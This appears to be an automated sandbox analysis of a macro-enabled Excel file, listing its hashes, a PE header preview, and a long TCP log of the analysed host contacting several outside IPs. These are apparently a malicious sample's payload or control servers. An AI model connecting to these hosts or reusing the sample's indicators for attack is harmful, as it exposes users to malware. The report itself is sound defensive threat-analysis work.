Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.939406715195173
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	Schedule-982347-Y6844315.xlsm
File size:	189905
MD5:	e0d3214ff37a8a28babb83c90db540e8
SHA1:	ceefb39c44d9b761d548722d87985c524a9584ff
SHA256:	b7c18213b34bb408434dbfd34b2719b17193ce695819d8b798454d38010ccc89
SHA512:	c7ee6a3a139de3856f9640dff32fdccd9cf20385b3b11445136f3a119e865202aec4d6d36624db83f2e606b8fc2eae165f1b47b498987124d9a5d65e89913c0c
SSDEEP:	3072:sDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:WRcGUlFzy4mpTHdrUc3/SsYASx
File Content Preview:	PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 17:07:15.851933002 CEST	49165	80	192.168.2.22	104.21.52.111
Jul 6, 2021 17:07:15.892039061 CEST	80	49165	104.21.52.111	192.168.2.22
Jul 6, 2021 17:07:15.893697977 CEST	49165	80	192.168.2.22	104.21.52.111
Jul 6, 2021 17:07:15.893748999 CEST	49165	80	192.168.2.22	104.21.52.111
Jul 6, 2021 17:07:15.933501005 CEST	80	49165	104.21.52.111	192.168.2.22
Jul 6, 2021 17:07:15.979367971 CEST	80	49165	104.21.52.111	192.168.2.22
Jul 6, 2021 17:07:15.979394913 CEST	80	49165	104.21.52.111	192.168.2.22
Jul 6, 2021 17:07:15.979512930 CEST	49165	80	192.168.2.22	104.21.52.111
Jul 6, 2021 17:07:16.070327997 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.110909939 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.111037016 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.112478018 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.150614977 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212357044 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212430000 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212482929 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212528944 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212565899 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212600946 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212616920 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212635040 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212644100 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212646961 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212649107 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212670088 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212682962 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212703943 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212716103 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212745905 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.212748051 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.212987900 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.213053942 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.213104963 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.213120937 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.213146925 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.213988066 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.214015961 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.214095116 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.214934111 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.214962959 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.214999914 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.215080023 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219259024 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219310045 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219347954 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219384909 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219391108 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219405890 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219422102 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219455004 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219469070 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219504118 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219527960 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219777107 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219819069 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.219849110 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219885111 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.219924927 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.220746040 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.220784903 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.220801115 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.220834970 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.221734047 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.221774101 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.221813917 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.221829891 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.222742081 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.222790956 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.222822905 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.222860098 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.223954916 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.224966049 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.251282930 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.251319885 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.251399994 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.251454115 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.252172947 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.252201080 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.252234936 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.252260923 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.252288103 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.252438068 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.252448082 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.252451897 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.254110098 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.254149914 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.254184961 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.254218102 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.254249096 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.254293919 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.254301071 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.254307032 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.255173922 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.255212069 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.255270958 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.255290031 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.259171963 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.259205103 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 17:07:16.259316921 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.259351969 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 17:07:16.335803986 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:07:16.375319004 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 17:07:16.375509977 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:07:16.376646042 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:07:16.415318966 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 17:07:16.438361883 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 17:07:16.438410044 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 17:07:16.438508987 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:07:16.438560009 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 17:07:17.487862110 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:17.526499987 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.526731014 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:17.539587975 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:17.577693939 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.577820063 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.577878952 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.577929974 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.578002930 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:17.579943895 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.579988003 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.580091953 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:17.599323988 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:17.637403011 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.638104916 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:17.841510057 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.051737070 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.091948032 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.204559088 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.204591036 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.204612970 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.204629898 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.204699993 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.294131041 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.294177055 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.294348955 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.295044899 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.295074940 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.295156956 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.295510054 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.295542002 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.295608997 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.296843052 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.296880960 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.296957970 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.297733068 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.297765970 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.297852993 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.300949097 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.301122904 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.301235914 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.301986933 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.302057981 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.302081108 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.302103996 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.302124977 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.302148104 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.302181959 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.302366018 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.303594112 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.303646088 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.303730965 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.304984093 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.305025101 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.305166960 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.306193113 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.384520054 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.384593964 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.384630919 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.384669065 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.384799957 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.385066986 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.385104895 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.385165930 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.386331081 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.386459112 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.386559010 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.389935970 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.389971018 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.390000105 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.390024900 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.390049934 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.390074968 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.390105963 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.390130043 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.391608000 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.391741037 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.391846895 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.392808914 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.393135071 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.394227028 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.394320965 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.395380974 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.395431995 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.395530939 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.395601988 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.395778894 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.395838976 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.395953894 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.396070004 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.396126032 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.396131039 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.398158073 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.398186922 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.398272991 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.399454117 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.399516106 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.399595976 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.399853945 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.399878025 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.399933100 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.425375938 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.425482035 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.425575972 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.425649881 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.425673962 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.426170111 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.426203966 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.426275015 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.427221060 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.427233934 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.427336931 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.473225117 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.473264933 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.473495007 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.473629951 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.473653078 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.473722935 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.474512100 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.474540949 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.474620104 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.475604057 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.475621939 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.475722075 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.476577997 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.476603985 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.476682901 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.477756023 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.477780104 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.477893114 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.478101969 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.478118896 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.478205919 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.478990078 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.479007006 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.479093075 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.479935884 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.479985952 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.480061054 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.480823994 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.480842113 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.480926991 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.481713057 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.481731892 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.481867075 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.482812881 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.482970953 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.483047962 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.486372948 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486397028 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486462116 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486493111 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486522913 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486531973 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.486560106 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.486568928 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486607075 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486634016 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.486726999 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.487462997 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.487484932 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.487561941 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.488135099 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.488152027 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.488269091 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.488961935 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.491379976 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.491488934 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.491852999 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.491919041 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.492026091 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.492585897 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.492670059 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.492988110 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.493483067 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.493499994 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.493511915 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.493524075 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.493539095 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.493551016 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.493654966 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.493683100 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.515393019 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515417099 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515429020 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515444040 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515455961 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515467882 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515621901 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.515742064 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.515758991 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.516273022 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.516577005 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.516592026 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.516752958 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.520200014 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.520247936 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.520381927 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.520519018 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.520555019 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.520570040 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.520714045 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.520714045 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.521054983 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.521547079 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.521575928 CEST	443	49168	13.224.92.73	192.168.2.22
Jul 6, 2021 17:07:18.521688938 CEST	49168	443	192.168.2.22	13.224.92.73
Jul 6, 2021 17:07:18.522464991 CEST	443	49168	13.224.92.73	192.168.2.22
